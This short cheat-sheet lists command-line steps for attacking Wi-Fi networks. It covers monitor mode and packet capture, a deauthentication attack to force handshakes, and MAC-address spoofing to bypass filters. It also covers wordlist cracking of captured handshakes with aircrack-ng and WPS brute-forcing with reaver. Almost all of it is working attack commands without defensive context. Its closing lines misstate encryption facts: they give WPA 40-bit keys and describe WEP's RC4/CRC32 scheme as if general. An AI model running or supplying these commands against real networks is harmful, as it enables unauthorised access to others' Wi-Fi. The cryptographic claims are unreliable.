$ airmon-ng start wlan0
We can not see packages from SSIDs that we are not associated with
We capture packages running:
$ airodump-ng mon0
We can launch a de-authentication attack to speed up the process:
$ aireplay-ng -0 3 -a <macaddress of the ap> mon0
$ airodump-ng mon0 --bssid –c (channel) –w (file name to save)
Bypass MAC filter
$ macchanger –m B0:D0:9C:5C:EF:86 wlan0
Cracking the cap
$ aircrack-ng RHAWEP-0.1-cap -w /wordlist
$ reaver –i mon0 –b <bssid> –d 0
WPA uses 40 bit keys and WEP2 104bits. Encryption is done per packet basis.
Every packet uses CRC32 for error detection and RC4 for encryption.